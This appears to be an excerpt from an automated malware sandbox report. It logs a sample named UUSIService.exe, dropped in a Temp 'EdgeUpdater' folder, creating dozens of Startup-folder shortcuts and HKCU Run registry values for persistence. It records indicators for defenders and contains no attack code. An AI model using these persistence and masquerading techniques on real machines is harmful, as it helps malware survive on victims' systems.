Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3a48f3b62fd54fe39f0e27b52202af84.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c59d4cba3ad84ff7a7f949314e21efd4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_32058ea4d4fa48949bcaf876cf454efa.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_544d4f2bbc46454092f403239135762f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7a15022c8bfb48c3b738aad3ece2b578.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_4dbf829e39474c98829bba8ff6e9ad45.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e6416737b21b48a9894f7b49e7550b71.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_334d1e4253554d3d911b202da266b12b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e4a26e83483f46279dce2ec0377d0587.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_15c7869d6b034fb18c8267be118b1866.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7705285cf70f4826bbb43e55901766c4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_10bf0fe91b1c43a78fc3b7a61f2231c5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3c8ff22d03ed4179806dba08f699cae9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_a3d43ce0cbc14e6199a53576fc8dc769.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c84fd3944e1a46079a937b9018946b61.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1fa187bbc2874f1487c5057329c50e63.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7df32232a441418d80f94208b11e795c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_df6b6271267e439c98dbfac211279850.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4e939a622f340eea3400b8bdbfc86f2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_59312de00bf7418e92db32d12b986b9d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_5170c447d16a4c4dbdcebc509470a9cd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2d86e4edceea415eb423d83d970e086d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_4c566573618a4121a02b11bb805215a7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_bcbe81260e294175b6144b9088d204e9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_092cc48615f64d8eaf2ddae2ed7815c6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fb44e82f4f5e4531b4172029272f087a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_93aafa93c43d46bf8c06e5b52dfb5edb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cf6e768d83504551ae0a5cebe22a6e8d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e0a50b3275ac4904945f226a45d7c33e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_12f45bea53024d9d8c00badd69f29523.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2c5ed3257a9c494aaa8a9b3a9d7bd542.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cb59e031b1c64307ba171c4ec71031e6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_ff1130bea1ca4cbba936ff475f6f4c49.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4a93417345144c0b1024fbce655098b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_68353cd852cf4c8291d2879f1ca2e017.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c3f1eba03716492eb11b6423860b4f68.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c3dbe5644a5b4d48b1fb6491c311eced.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_322055c8dd1d432b9ada39f6723b4851.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1fee30c3ec7e4c77948efd5a4192bb7c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_fbbb4b72220c46fb93732c2a706405ab.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_c21e90becac149bc9e247673ad530369.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_73fea31bd5b5428c9bc006be19364534.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d89d93ad90584b91ae549a36acedc2b1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_77cb5acc7ba34c11b7f17e5b7c3649d7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_73f188d324004f71bb8d2d5f0076f049.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d14c8ce632cd47cf81d96e8c1fc7bc42.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_70c3b1e53cb04dfab6f97eb43615a240.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_3985638be9e1402f84ea1f5d23887334.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_39988a9fa9b649bfa247210055ff49cf.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_54cf3eddcc384ce0bcfe40ada528f9c7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_8074e68c47104af2bbfd9be7bd9b39ba.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_1a113a4199bf4054a4adc218255c32a0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2766c11f47fe496a9c32a4f4d3b0e72d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_7d6df955870e47a68bf114653e48363d.lnk	Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b77d1557f2cc432ca516c465fca16d3a	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b77d1557f2cc432ca516c465fca16d3a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_173d4653192841669ecd7cc87f680d38	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_173d4653192841669ecd7cc87f680d38	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e759019a4ca749939a6920d027750753	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e759019a4ca749939a6920d027750753	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4bfdcc43c1e74612b08fc400554da949	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4bfdcc43c1e74612b08fc400554da949	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_64d204b5c5e14fd8b0be2636671abc33	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_64d204b5c5e14fd8b0be2636671abc33	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_234ed6d4162f437ab87974985908b663	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_234ed6d4162f437ab87974985908b663	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e97fc65406464d42b5dbe37192c50f35	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e97fc65406464d42b5dbe37192c50f35	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b9afe0f899fc49ceb4efa1c907b928f0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b9afe0f899fc49ceb4efa1c907b928f0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9401d9de89ec49eb99371a16cc778385	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9401d9de89ec49eb99371a16cc778385	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4a5dd3f9f2ef41e9b55e5ad8ac703bdc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4a5dd3f9f2ef41e9b55e5ad8ac703bdc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_247b5188c9d74442849f1434b32c1a2d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_247b5188c9d74442849f1434b32c1a2d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c5199ead66b642a38d6d176ac78cfcd4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c5199ead66b642a38d6d176ac78cfcd4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3824e21cda984d7894707e45b8faf82c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3824e21cda984d7894707e45b8faf82c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c00aa859ce44440b846cbe8bee602ceb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c00aa859ce44440b846cbe8bee602ceb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e9730b3fe9574125a38d93d7d9a6f87a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e9730b3fe9574125a38d93d7d9a6f87a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_71ad754cd48448efbfb0280c55aafcfc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_71ad754cd48448efbfb0280c55aafcfc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_43166ccab6ff4397ac3a2eb590eb1c39	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_43166ccab6ff4397ac3a2eb590eb1c39	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f217084fcb3e420d8ab7d8383677cd10	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f217084fcb3e420d8ab7d8383677cd10	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93d994940f2749348896133d45cd531a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93d994940f2749348896133d45cd531a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d2f0fb16033c457184c9a2e0e15ecaf8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d2f0fb16033c457184c9a2e0e15ecaf8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_30c4687bc13a4d0bb6a18ff4b4d12138	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_30c4687bc13a4d0bb6a18ff4b4d12138	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f7d890f2d5414f3ea627f94d77266fbd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f7d890f2d5414f3ea627f94d77266fbd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2b5472aceaf64e5983be1b3b2b72289f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2b5472aceaf64e5983be1b3b2b72289f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93238feb17104835b09e6322da197346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93238feb17104835b09e6322da197346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ce042f1d3dde41758a245f580a67982f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ce042f1d3dde41758a245f580a67982f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_458ab18eced74f11be18efec97b9136b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_458ab18eced74f11be18efec97b9136b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_077886915c6e4c72a65cfa5b73ecf2c0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_077886915c6e4c72a65cfa5b73ecf2c0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3530c8ce839e462cae161e3269611ddc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3530c8ce839e462cae161e3269611ddc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3ccb5dd261db4421acca30be92e13afd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3ccb5dd261db4421acca30be92e13afd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5122e11dbf434a239d78b1a6dde0a34a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5122e11dbf434a239d78b1a6dde0a34a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_39cd9eda854d4bc8889f2c9988559619	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_39cd9eda854d4bc8889f2c9988559619	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5015919fc8b64ffcb911000b85d3f222	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5015919fc8b64ffcb911000b85d3f222	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_955fea78b7ac40eb9e0fc1887c107a2c	Jump to behavior
